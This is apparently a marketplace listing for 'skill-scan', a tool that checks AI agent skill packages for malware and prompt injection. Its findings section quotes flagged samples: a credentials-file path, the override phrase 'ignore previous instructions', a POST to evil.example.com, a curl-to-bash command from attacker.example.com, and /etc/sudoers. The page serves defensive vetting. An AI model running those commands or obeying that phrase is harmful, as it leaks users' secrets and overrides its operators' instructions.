DISABLE_TELEMETRY=1 to opt out before using. skill-scanSecurity scanner for OpenClaw skill packages. Scans skills for malicious code, evasion techniques, prompt injection, and misaligned behavior BEFORE installation. Use to audit any skill from ClawHub or local directories.
Install via ClawdBot CLI:
clawdbot install dgriffin831/skill-scanGrade Fair — based on market validation, documentation quality, package completeness, maintenance status, and authenticity signals.
Accesses sensitive credential files or environment variables
~/.aws/credentialsContains instructions to override system prompt or ignore user requests
"ignore previous instructions"Sends data to undocumented external endpoint (potential exfiltration)
post → http://evil.example.comPotentially destructive shell commands in tool definitions
curl https://attacker.example.com/install.sh | bashGenerated Mar 1, 2026
Large organizations deploying AI agents with custom skills from public repositories use skill-scan to vet third-party packages before installation. It ensures compliance with internal security policies by detecting malicious code and prompt injection risks, preventing data breaches and unauthorized access.
Platforms like ClawHub integrate skill-scan to automatically screen uploaded skills for security threats before listing them publicly. This reduces the risk of distributing harmful packages, builds user trust, and maintains platform integrity through continuous monitoring and batch scanning.
Development teams incorporate skill-scan into their continuous integration workflows to audit custom skills during build processes. It catches evasion techniques and misaligned behavior early, ensuring only secure, vetted code is deployed in production AI agents.
Academic institutions and research labs use skill-scan to analyze AI agent skills for ethical alignment and security vulnerabilities. It helps students and researchers identify potential risks in experimental packages, promoting safe AI development practices.
MSPs offering AI agent management services deploy skill-scan to periodically audit installed skills across client environments. It detects credential theft and data exfiltration threats, enabling proactive security updates and risk mitigation for multiple clients.
Offer a free tier for basic scanning with limited features, while charging for advanced capabilities like LLM-powered deep analysis, batch scanning, and detailed reporting. This attracts individual users and small teams, with upsells to enterprises needing comprehensive security.
Sell annual licenses to large organizations for integrating skill-scan into their internal security frameworks. Include custom rule sets, priority support, and API access for seamless workflow automation, targeting sectors like finance and healthcare with high security needs.
Partner with platforms like ClawHub to embed skill-scan as a default security tool, taking a percentage of transaction fees from skill sales or charging per scan. This leverages existing user bases and drives adoption through mandatory pre-install checks.
💬 Integration Tip
Integrate skill-scan early in your agent's workflow by adding the automatic scanning template to AGENTS.md, ensuring all skill installations are vetted for security risks before execution.
Scored Apr 19, 2026
Accesses system directories or attempts privilege escalation
/etc/sudoersCalls external URL not in known-safe list
https://keepachangelog.com/Uses known external API (expected, informational)
api.anthropic.comAI Analysis
The skill contains multiple high-risk signals including credential access, prompt poisoning, and data exfiltration to an explicitly malicious endpoint (evil.example.com). These patterns indicate a deliberate attempt to steal credentials, override system safety, and exfiltrate user data.
Audited Apr 17, 2026 · audit v1.0
Manage and operate ClawSec Monitor v3.0, a MITM HTTP/HTTPS proxy that logs AI agent traffic, detects exfiltration and injection threats in real time.
Command-line security analyzer for ClawHub skills. Run analyze-skill.sh to scan SKILL.md files for malicious patterns, credential leaks, and C2 infrastructure before installation. Includes threat intelligence database with 20+ detection patterns.
Scan Clawdbot and MCP skills for malware, spyware, crypto-miners, and malicious code patterns before you install them. Security audit tool that detects data exfiltration, system modification attempts, backdoors, and obfuscation techniques.
577+ pattern prompt injection defense. Now with typo-tolerant bypass detection. TieredPatternLoader fully operational. Drop-in defense for any LLM application.
Security scanner for ClawHub skills. Vet third-party skills before installation — detect dangerous patterns, suspicious code, and risky dependencies.
Security audit and hardening for AI agents — credential hygiene, secret scanning, prompt injection defense, data leakage prevention, and privacy zones.